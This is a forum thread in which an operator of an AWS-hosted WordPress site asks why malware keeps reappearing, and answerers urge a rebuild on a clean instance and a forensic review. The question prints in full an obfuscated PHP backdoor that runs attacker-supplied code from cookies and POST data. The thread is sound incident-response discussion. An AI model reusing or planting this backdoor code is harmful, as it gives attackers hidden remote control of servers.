Malware installs itself again and again autonomously

Question

We have some malware on our aws (hosting Wordpress and own application) instance which is doing strange things:

chmod 755 /var/www/html independently of what it was before

copies index.html to index.html.bak.bak and deletes index.html When I run ausearch on index.html, I get directed to a folder managed by our application that contains an object with randomname.php, like mqnwtxzg.php. Contents of such php file:

$wezhgja = 'incsr_f8y-g6a9kl3ubx\'5vp14d7mt*#oHe';$lcxtas = Array();$lcxtas[] = $wezhgja[2].$wezhgja[6].$wezhgja[2].$wezhgja[21].$wezhgja[27].$wezhgja[18].$wezhgja[11].$wezhgja[27].$wezhgja[9].$wezhgja[27].$wezhgja[24].$wezhgja[25].$wezhgja[2].$wezhgja[9].$wezhgja[25].$wezhgja[21].$wezhgja[13].$wezhgja[11].$wezhgja[9].$wezhgja[13].$wezhgja[7].$wezhgja[27].$wezhgja[12].$wezhgja[9].$wezhgja[24].$wezhgja[16].$wezhgja[18].$wezhgja[21].$wezhgja[24].$wezhgja[18].$wezhgja[18].$wezhgja[2].$wezhgja[25].$wezhgja[18].$wezhgja[24].$wezhgja[2];$lcxtas[] = $wezhgja[2].$wezhgja[4].$wezhgja[34].$wezhgja[12].$wezhgja[29].$wezhgja[34].$wezhgja[5].$wezhgja[6].$wezhgja[17].$wezhgja[1].$wezhgja[2].$wezhgja[29].$wezhgja[0].$wezhgja[32].$wezhgja[1];$lcxtas[] = $wezhgja[33].$wezhgja[30];$lcxtas[] = $wezhgja[31];$lcxtas[] = $wezhgja[2].$wezhgja[32].$wezhgja[17].$wezhgja[1].$wezhgja[29];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[5].$wezhgja[4].$wezhgja[34].$wezhgja[23].$wezhgja[34].$wezhgja[12].$wezhgja[29];$lcxtas[] = $wezhgja[34].$wezhgja[19].$wezhgja[23].$wezhgja[15].$wezhgja[32].$wezhgja[26].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[17].$wezhgja[18].$wezhgja[3].$wezhgja[29].$wezhgja[4];$lcxtas[] = $wezhgja[12].$wezhgja[4].$wezhgja[4].$wezhgja[12].$wezhgja[8].$wezhgja[5].$wezhgja[28].$wezhgja[34].$wezhgja[4].$wezhgja[10].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[15].$wezhgja[34].$wezhgja[1];$lcxtas[] = $wezhgja[23].$wezhgja[12].$wezhgja[2].$wezhgja[14];foreach ($lcxtas[8]($_COOKIE, $_POST) as $tlfwyg => $bdxjqs){function irgndu($lcxtas, $tlfwyg, $zskgpvt){return $lcxtas[7]($lcxtas[5]($tlfwyg . $lcxtas[0], ($zskgpvt / $lcxtas[9]($tlfwyg)) + 1), 0, $zskgpvt);}function fpdyn($lcxtas, $eklrh){return @$lcxtas[10]($lcxtas[2], $eklrh);}function zmychft($lcxtas, $eklrh){$rugfslb = $lcxtas[4]($eklrh) % 3;if (!$rugfslb) {$zttttc = $lcxtas[1]; $tdber = $zttttc("", $eklrh[1]($eklrh[2]));$tdber();exit();}}$bdxjqs = fpdyn($lcxtas, $bdxjqs);zmychft($lcxtas, $lcxtas[6]($lcxtas[3], $bdxjqs ^ irgndu($lcxtas, $tlfwyg, $lcxtas[9]($bdxjqs))));}

In another random folder I find objects like these: /somefolder/.5d45a5b3.ico

We regularly check for this stuff and delete all these strange objects, but a day or so later, they are back again. Only thing that changed is that the strange objects have now different names and are placed in different folders.

We are running malware scans on our system and they detect these objects, but nothing so far prevents them from coming back.

Did anyone experience similar problems and can anyone recommend anything to get rid of this stuff?

Can anyone guide us to someone who can help, even if that service would be payable?

Dennis · Answer 1 · 2019-10-24T07:34:16.613

0

Instead of fixing the symptoms you should direct your focus on making sure that your Wordpress installation is the latest version and update any plugins to the latest version. Considering the current system is compromised, do not try to "patch it". It is likely backdoor'ed. Do not trust it. Make a back up of the data instead (e.g. the database) and rebuild the wordpress site on a new instance using the latest versions.

Have a look at https://wordpress.org/support/article/faq-my-site-was-hacked/ and https://wordpress.org/support/article/hardening-wordpress/

edited Oct 24 '19 at 07:34

answered Oct 22 '19 at 13:54

Dennis

779
4
14

It is the latest WP version... Do you have a better suggestion? – michaelsmith Oct 22 '19 at 18:13
Do you have any plugins installed that may be out of date ? Have they been out of date previously ? Has an old version of WP been running previously that might have installed a backdoor ? The point still stands though: Start fresh with a new uncompromised instance. – Dennis Oct 22 '19 at 19:17
All plugins are up to date and have always been updated regularly in the past. The problems started in April this year. Reinstalling the instance is very difficult as we have 15 million database connections on that instance per month. Shutting it down & rebuilding would be a major disruption to our users. There should be a way to find out what is triggering this bahaviour – michaelsmith Oct 24 '19 at 07:09
My two pence: You have a compromised production system with potentially sensitive data. Depending on where your business is situated you might be compelled by law to report the (potential) data leak. I think it is _the_ time to inconvenience your users and do a proper analysis. The system is likely backdoored. Yes, there are ways to do analysis on the live system. However, I strongly recommend that you migrate the data to a new instance, reinstall the front/backend software and switch to the new database endpoints. Make a snapshot of the old system and thoroughly analyse that. – Dennis Oct 24 '19 at 07:29
In addition, have a look at https://medium.com/@lakin.mohapatra/prevent-wordpress-malware-from-infecting-server-8d5715c663fe as it particularly mentions malicious .ico files on a malware infected Wordpress and how to proceed with finding the root cause. – Dennis Oct 24 '19 at 07:38

Malware installs itself again and again autonomously

1 Answers1